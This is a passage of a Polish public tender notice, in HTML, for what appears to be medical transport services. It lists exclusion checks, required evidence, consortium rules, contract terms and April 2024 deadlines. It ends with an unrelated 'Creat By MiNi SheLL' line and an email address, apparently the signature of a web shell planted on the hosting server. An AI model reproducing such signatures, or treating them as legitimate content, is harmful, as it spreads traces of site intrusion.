sankcyjnej<br/>1) Zbadanie istnienia podstaw wykluczenia nastąpi na podstawie art. 2 ) Ustawy sankcyjnej w oparciu o:<br/>a) Rozporządzenie Rady UE nr 765/2006 z dnia 18 maja 2006 r dotyczącego środków organizacyjnych w związku z sytuacja na<br/>Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z 20.05.2006, str 1 ze zm.)<br/>b) Rozporządzenie Rady UE nr 269/2014 z dnia 17 marca 2014 roku w sprawie środków ograniczających w odniesieniu do działań<br/>podważających integralność terytorialną , suwerenności niezależność Ukrainy lub im zagrażających (Dz. Urz. UE L 78 z 17.03.2014,<br/>str 6 ze zm.)<br/>c) Listę osób i podmiotów, wobec których są stosowane środki, o których mowa w art. 1 Ustawy sankcyjnej prowadzonej przez<br/>ministra właściwego do spraw wewnętrznych publikowanej w Biuletynie Informacji Publicznej na stronie podmiotowej ministra<br/>właściwego do spraw wewnętrznych<br/>d) Oświadczenie własne wykonawcy - wg wzoru stanowiącego załącznik nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające spełnienie warunków udziału w postępowaniu:<br/>2.1.1. W zakresie sytuacji ekonomicznej lub finansowej<br/>1) Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>2) Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków<br/>dowodowych, o których mowa w ust. 1), wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób<br/>potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej<br/>. W zakresie zdolności technicznej lub zawodowej<br/>1) Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich uprawnień do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór stanowi załącznik nr 5 do<br/>SWZ<br/>2) Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - wzór stanowi załącznik nr 4 do SWZ<br/>5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>Wykaz oświadczeń składanych wraz z ofertą:<br/>1) Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykazaniu braku podstaw do wykluczenia z<br/>postępowaniu - wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>a) Oświadczenie stanowi wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w<br/>postępowaniu odpowiednio na dzień składania ofert<br/>b) Oświadczenie stanowi wstępne potwierdzenie, że podmiot udostępniający zasoby nie podlega wykluczeniu oraz spełnia<br/>warunki udziału w postępowaniu, w zakresie w jakim wykonawca powołuje się na jego zasoby odpowiednio na dzień<br/>składania ofert<br/>c) Oświadczenie, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienie.<br/>Oświadczenie ma potwierdzać spełnienie warunków udziału w postępowaniu, w zakresie , w którym każdy z wykonawców<br/>wykazuje spełnienie tych oraz wykazać brak podstaw do wykluczenia każdego z wykonawców.<br/>d) Oświadczenie składa podmiot udostępniający zasoby.<br/>Oświadczenie ma potwierdzać spełnienie warunków udziału w postępowaniu w zakresie w jakim wykonawca powołuje się<br/>na zasoby danego podmiotu oraz wykazać brak podstaw do wykluczenia podmiotu.<br/>2) Zamawiający informuje, że Wykonawca może wykorzystać dokument złożony w odrębnym postępowaniu o udzielenie<br/>zamówienia, jeżeli potwierdzi, że informacje w nim zawarte pozostają prawidłowe.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia oświadczenia, o którym mowa<br/>w art. 117 ust. 4 ustawy PZP. Z treści oświadczenia winno jednoznacznie wynikać, które usługi wykonają poszczególni<br/>wykonawcy w odniesieniu do warunków udziału w postępowaniu określonych w pkt VI.1 pkt 1) ppkt a) SWZ do realizacji, których zdolności są wymagane- wg wzoru stanowiącego załącznik nr 2A do SWZ.<br/>6. Pozostałe dokumenty wymagane wraz z ofertą<br/>1) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania osoby działającej w imieniu<br/>odpowiednio: wykonawcy lub wykonawców wspólnie ubiegających się o udzielenie zamówienia – chyba że umocowanie do<br/>reprezentowania określonego podmiotu wynika z informacji ujawnionych w Krajowym Rejestrze Sądowym, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innym właściwym rejestrze<br/>2) Pełnomocnictwo przekazuje się w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym lub<br/>podpisem zaufanym lub podpisem osobistym lub w przypadku dokumentu w postaci papierowej - w postaci cyfrowego<br/>odwzorowania dokumentu opatrzonego kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem<br/>osobistym przez mocodawcę lub notariusza</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania, jakie musi spełniać oferta składana przez dwa lub więcej podmiotów (Wykonawców ubiegających się<br/>wspólnie o udzielenie zamówienia np. konsorcja, spółki cywilne):<br/>1) Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia<br/>2) Wykonawcy występujący wspólnie zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego;<br/>3) Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako reprezentant<br/>pozostałych.<br/>4) Nie dopuszcza się uczestniczenia któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia w<br/>więcej niż jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym jest również<br/>złożenie przez któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia, równocześnie oferty<br/>indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5) Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych we Wzorze Umowy, stanowiącym Załącznik nr 3 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 PZP oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 3 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5. Wykonawca na dzień podpisania umowy powinien posiadać i przedłożyć zamawiającemu do wglądu następujące<br/>dokumenty:<br/>• aktualną polisę ubezpieczeniową od odpowiedzialności cywilnej za szkody przewozowe na osobach i materiałach na kwotę<br/>min 500 000,00 zł<br/>• dokumenty potwierdzające kwalifikacje zawodowe osób wymienionych w wykazie osób(zezwolenie do prowadzenia<br/>pojazdów uprzywilejowanych)<br/>• świadectwo homologacji pojazdu skompletowanego (samochód bazowy wraz z zabudową medyczną dla pojazdu<br/>wymienionego w wykazie narzędzi)<br/>• zaświadczenie stacji kontroli pojazdów, upoważnionej do przeprowadzania badań technicznych pojazdów o<br/>przeprowadzeniu badań technicznych przed dopuszczeniem do ruchu pojazdu uprzywilejowanego zgodnie z ustawą o ruchu<br/>drogowym (dla pojazdu wymienionego w wykazie narzędzi)<br/>• deklaracje zgodności potwierdzające zgodność z normą min -PN- EN 1789 +A– min „Typ A” <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-08 09:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem Platformy eZamawiajacy dostępnej pod adresem https://spskgruca.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-08 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> XII OPIS SPOSOBU PRZYGOTOWANIA OFERTY<br/>1. Wykonawca zobowiązany jest złożyć na dzień składania ofert:<br/>a) Formularz ofertowy z wykorzystaniem wzoru stanowiącego Załącznik nr 1 do SWZ<br/>b) Oświadczenie Wykonawcy, że spełniania warunki udziału w postępowaniu oraz nie podlega wykluczeniu - wg wzoru<br/>stanowiącego załącznik nr 2 do SWZ<br/>c) Oświadczenie podmiotu udostępniającego zasoby, że spełniania warunki udziału w postępowaniu w zakresie w jakim<br/>wykonawca powołuje się na jego zasoby oraz nie podlega wykluczeniu - wg wzoru stanowiącego załącznik nr 2 do SWZ. ( o<br/>ile dotyczy)<br/>d) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia - wg wzoru stanowiącego załącznik nr<br/>2A do SWZ ( o ile dotyczy)<br/>e) Zobowiązanie podmiotu udostępniającego zasoby ( o ile dotyczy)<br/>f) Pełnomocnictwo ( o ile dotyczy)<br/>UWAGA!!!<br/>Załącznik nr 1 do SWZ stanowi treść oferty i w związku z tym nie podlega uzupełnieniu.<br/>Brak tego dokumentu stanowi o nieważności złożonej oferty.

Creat By MiNi SheLL
Email: jattceo@gmail.com